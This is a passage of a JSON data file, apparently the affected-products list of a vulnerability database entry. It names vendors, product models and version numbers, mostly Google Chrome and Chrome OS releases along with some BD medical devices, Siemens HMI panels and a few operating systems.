        "version": "25.0.1364.115"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.688.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1050.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.479.0"
      },
      {
        "model": "pyxis parx handheld",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.960.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.838.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.394.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.41"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.718.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.503.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.890.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1057.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "41.0.2272.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.528.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.25"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1676.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.2491064"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.105"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1023.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.325.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1010.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.724.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.335.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.431.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.498.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.51"
      },
      {
        "model": "facscalibur",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.612.3"
      },
      {
        "model": "facscanto 10-color clinical",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.406.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.938.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.515.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1294.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.36"
      },
      {
        "model": "viper xtr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.445.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.409.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.775.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.315.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.119"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.54"
      },
      {
        "model": "enterprise linux for power little endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.21"
      },
      {
        "model": "facsaria i/ii/iii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.741.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.170.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.588.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.59"
      },
      {
        "model": "windows server for x64-based systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1045.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.799.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.511.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.104"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1073.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.152"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.792.0"
      },
      {
        "model": "pyxis medstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "40000"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1667.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.322"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1279.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.169.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.272.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.97"
      },
      {
        "model": "pyxis medstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "35000"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.411.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.47"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.367.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1016"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1045"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.112"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.106"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.634.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.454.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1029.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.337.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.507.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1032"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1302.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.118"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.827.0"
      },
      {
        "model": "lsrfortessa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.642.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.945.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.151"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "52.0.2743.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.107"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1666.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "44.0.2403"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.895.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.355.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "57.0.2987.137"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.21"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.95"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.308.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.44"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.13"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1272.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.234"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.21"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.171"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.104"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.0"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.650.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "51.0.2704.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.338.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.451.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.135"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.59"
      },
      {
        "model": "simatic hmi comfort panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "22"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.156"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1301.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.222.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.868.0"
      },
      {
        "model": "simatic hmi comfort panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.536.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1304.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1671.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1017.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.15"
      },
      {
        "model": "pyxis cubie replenishment station",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.6"
      },
      {
        "model": "facssample prep assistant iii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.427.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.5"
      },
      {
